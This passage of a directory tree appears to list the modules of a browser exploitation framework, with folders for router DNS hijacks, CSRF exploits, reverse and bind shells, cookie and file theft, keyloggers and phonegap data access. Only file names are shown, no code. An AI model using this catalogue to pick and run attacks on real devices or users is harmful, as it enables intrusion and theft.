webcam_html5/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ └── webcam_permission_check/ │ │ ├── cameraCheck.as │ │ ├── cameraCheck.swf │ │ ├── command.js │ │ ├── config.yaml │ │ ├── module.rb │ │ └── swfobject.js │ ├── chrome_extensions/ │ │ ├── execute_tabs/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_all_cookies/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── grab_google_contacts/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── inject_beef/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── screenshot/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ └── send_gvoice_sms/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── debug/ │ │ ├── test_beef_debug/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── test_cors_request/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── test_dns_tunnel_client/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── test_get_variable/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── test_http_redirect/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── test_network_request/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── test_return_ascii_chars/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── test_return_image/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ └── test_return_long_string/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── exploits/ │ │ ├── apache_cookie_disclosure/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── apache_felix_remote_shell/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── beefbind/ │ │ │ ├── beef_bind_shell/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── shellcode_sources/ │ │ │ ├── linux/ │ │ │ │ ├── x64/ │ │ │ │ │ ├── socket64.c │ │ │ │ │ ├── stage64.nasm │ │ │ │ │ └── stager64.nasm │ │ │ │ └── x86/ │ │ │ │ ├── socket.c │ │ │ │ ├── stage.nasm │ │ │ │ └── stager.nasm │ │ │ ├── msf/ │ │ │ │ ├── README.md │ │ │ │ ├── beef_bind-handler.rb │ │ │ │ ├── beef_bind-stage-linux-x64.rb │ │ │ │ ├── beef_bind-stage-linux-x86.rb │ │ │ │ ├── beef_bind-stage-windows-x86.rb │ │ │ │ ├── beef_bind-stager-linux-x64.rb │ │ │ │ ├── beef_bind-stager-linux-x86.rb │ │ │ │ └── beef_bind-stager-windows-x86.rb │ │ │ └── windows/ │ │ │ ├── beef_bind_tcp-stage.asm │ │ │ ├── beef_bind_tcp-stager.asm │ │ │ ├── socket.c │ │ │ └── src/ │ │ │ ├── block_api.asm │ │ │ ├── block_beef_bind-stage.asm │ │ │ ├── block_beef_bind-stager.asm │ │ │ ├── block_bind_tcp.asm │ │ │ ├── block_pipes.asm │ │ │ ├── block_shell_pipes.asm │ │ │ ├── block_sleep.asm │ │ │ └── block_virtualalloc.asm │ │ ├── boastmachine_3_1_add_user_csrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── camera/ │ │ │ ├── airlive_ip_camera_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dcs_series_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── linksys_wvc_wireless_camera_csrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── coldfusion_dir_traversal_exploit/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── extract_cmd_exec/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── farsite_x25_remote_shell/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── firephp/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ └── payload.js │ │ ├── glassfish_war_upload_xsrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── groovyshell_server_cmd_exec/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── hp_ucmdb_add_user_csrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── jboss_jmx_upload_exploit/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── jenkins_groovy_code_exec/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── kemp_command_execution/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── local_host/ │ │ │ ├── activex_command_execution/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── java_payload/ │ │ │ │ ├── Applet_ReverseTCP.jar │ │ │ │ ├── README.txt │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── mozilla_nsiprocess_interface/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── safari_launch_app/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── signed_applet_dropper/ │ │ │ │ ├── README.txt │ │ │ │ ├── applet/ │ │ │ │ │ ├── SM.java │ │ │ │ │ ├── SignedApplet.jar │ │ │ │ │ └── SignedApplet.java │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── window_mail_client_dos/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── nas/ │ │ │ ├── dlink_sharecenter_cmd_exec/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── freenas_reverse_root_shell_csrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── ntfscommoncreate_dos/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── opencart_reset_password/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── pfsense/ │ │ │ ├── pfsense_2.3.2_reverse_root_shell_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ ├── module.rb │ │ │ │ └── x.js │ │ │ └── pfsense_reverse_root_shell_csrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── php-5.3.9-dos/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── qemu_monitor_migrate_cmd_exec/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── qnx_qconn_command_execution/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── resource_exhaustion_dos/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── rfi_scanner/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ ├── rfi.txt │ │ │ └── update-list │ │ ├── router/ │ │ │ ├── 3com_officeconnect_cmd_exec/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── actiontec_q1000_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── argw4_adsl_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── asmax_ar804gu_cmd_exec/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── asus_dslx11_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── asus_rt_n12e_get_info/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── asus_rt_n66u_cmd_exec/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── beetel_bcm96338_router_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── belkin_dns_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── bt_home_hub_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── cisco_e2400_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── comtrend_ct5367_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── comtrend_ct5624_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── comtrend_ct_series_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── ddwrt_v24_sp1_cmd_exec/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── ddwrt_v24_sp1_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dir_615_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dsl2640b_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dsl2640u_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dsl2740r_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dsl2780b_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dsl500t_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dsl526b_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── exper_ewm01_adsl_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── huawei_smartax_mt880/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── iball_baton_ib_wra150n_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── inteno_eg101r1_voip_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── linksys_befsr41_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── linksys_e2500_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── linksys_e2500_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── linksys_e2500_shell/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── linksys_wrt54g2_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── linksys_wrt54g_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── netgear_dgn2000_wan_remote_mgmt/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── netgear_dgn2200_cmd_exec/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── phillips_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── pikatel_96338_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── planet_vdr300nu_adsl_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── shuttle_tech_915wm_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── telstra_zte_mf91_change_pw/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── telstra_zte_mf91_change_ssid/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── telstra_zte_mf91_disable_ap_isolation/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── tenda_adsl_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── tplink_dns_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── utstarcom_wa3002g4_dns_hijack/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── virgin_superhub_csrf/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── wipg1000_cmd_injection/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── ruby_nntpd_cmd_exec/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── shell_shock_scanner/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ ├── shocker-cgi_list │ │ │ └── update-list │ │ ├── shell_shocked/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── skype_xss/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── spring_framework_malicious_jar/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── switch/ │ │ │ ├── dlink_dgs_1100_device_reset/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dgs_1100_fdb_whitelist/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── dlink_dgs_1100_port_mirroring/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── netgear_gs108t_csrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── vtiger_crm_upload_exploit/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── wanem_command_execution/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── wifi_pineapple_csrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── wordpress_add_admin/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── xss/ │ │ │ ├── alienvault_ossim_3.1_xss/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── cisco_collaboration_server_5_xss/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── serendipity_1.6_xss/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── sqlitemanager_xss/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── zenoss_3x_command_execution/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── zenoss_add_user_csrf/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ └── zeroshell/ │ │ ├── zeroshell_2_0rc2_admin_dynamic_token/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── zeroshell_2_0rc2_admin_password/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── zeroshell_2_0rc2_admin_static_token/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── zeroshell_2_0rc2_file_disclosure/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── zeroshell_2_0rc2_migrate_hook/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── zeroshell_2_0rc2_reverse_shell_csrf_sop/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ └── x.js │ │ └── zeroshell_2_0rc2_scanner/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── host/ │ │ ├── clipboard_theft/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_airdroid/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_antivirus/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_coupon_printer/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_cups/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_default_browser/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_google_desktop/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_hp/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_local_drives/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_protocol_handlers/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_software/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_users/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_battery_status/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_connection_type/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_internal_ip_java/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── get_internal_ip.java │ │ │ └── module.rb │ │ ├── get_internal_ip_webrtc/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_registry_keys/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_system_info_java/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── getSystemInfo.java │ │ │ └── module.rb │ │ ├── get_wireless_keys/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ ├── wirelessZeroConfig.jar │ │ │ └── wirelessZeroConfig.java │ │ ├── hook_default_browser/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── hook_microsoft_edge/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── insecure_url_skype/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── iphone_tel/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── physical_location/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ └── physical_location_thirdparty/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── ipec/ │ │ ├── cross_site_faxing/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── cross_site_printing/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── dns_tunnel/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── etag_client/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── inter_protocol_imap/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── inter_protocol_irc/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── inter_protocol_posix_bindshell/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── inter_protocol_redis/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── inter_protocol_win_bindshell/ │ │ │ ├── command.js │ │ │ ├── command.old.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ └── s2c_dns_tunnel/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── metasploit/ │ │ └── browser_autopwn/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── misc/ │ │ ├── blockui/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── ibm_inotes/ │ │ │ ├── extract_inotes_list/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── inotes_flooder/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── read_inotes/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── send_inotes/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── send_inotes_with_attachment/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── iframe_keylogger/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── iframe_sniffer/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── leakyframe.js │ │ │ └── module.rb │ │ ├── invisible_iframe/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── local_file_theft/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── nosleep/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ └── update-lib │ │ ├── raw_javascript/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── read_gmail/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── track_physical_movement/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── unblockui/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── wordpress/ │ │ │ ├── add_user/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── current_user_info/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── upload_rce_plugin/ │ │ │ │ ├── beefbind.php │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── wordpress_command.rb │ │ │ └── wp.js │ │ └── wordpress_post_auth_rce/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── network/ │ │ ├── ADC/ │ │ │ ├── f5_bigip_cookie_disclosure/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── f5_bigip_cookie_stealing/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── DOSer/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ └── worker.js │ │ ├── cross_origin_scanner_cors/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── cross_origin_scanner_flash/ │ │ │ ├── ContentHijacking.swf │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ └── swfobject.js │ │ ├── detect_burp/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_ethereum_ens/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_opennic/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_soc_nets/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_tor/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── dns_enumeration/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── dns_rebinding/ │ │ │ ├── README.md │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── fetch_port_scanner/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_http_servers/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_ntop_network_hosts/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_proxy_servers_wpad/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── identify_lan_subnets/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── internal_network_fingerprinting/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── jslanscanner/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── nat_pinning_irc/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── ping_sweep/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── ping_sweep_ff/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── ping_sweep_java/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── module.rb │ │ │ └── pingSweep.java │ │ └── port_scanner/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── persistence/ │ │ ├── confirm_close_tab/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── hijack_opener/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── iframe_above/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── invisible_htmlfile_activex/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── jsonp_service_worker/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── man_in_the_browser/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── popunder_window/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ └── popunder_window_ie/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── phonegap/ │ │ ├── phonegap_alert_user/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_beep/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_check_connection/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_detect/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_file_upload/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_geo_locate/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_globalization_status/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_keychain/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_list_contacts/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_list_files/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_persist_resume/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_persistence/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_plugin_detection/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_prompt_user/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── phonegap_start_record_audio/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ └── phonegap_stop_record_audio/ │ │ ├── command.js │ │ ├── 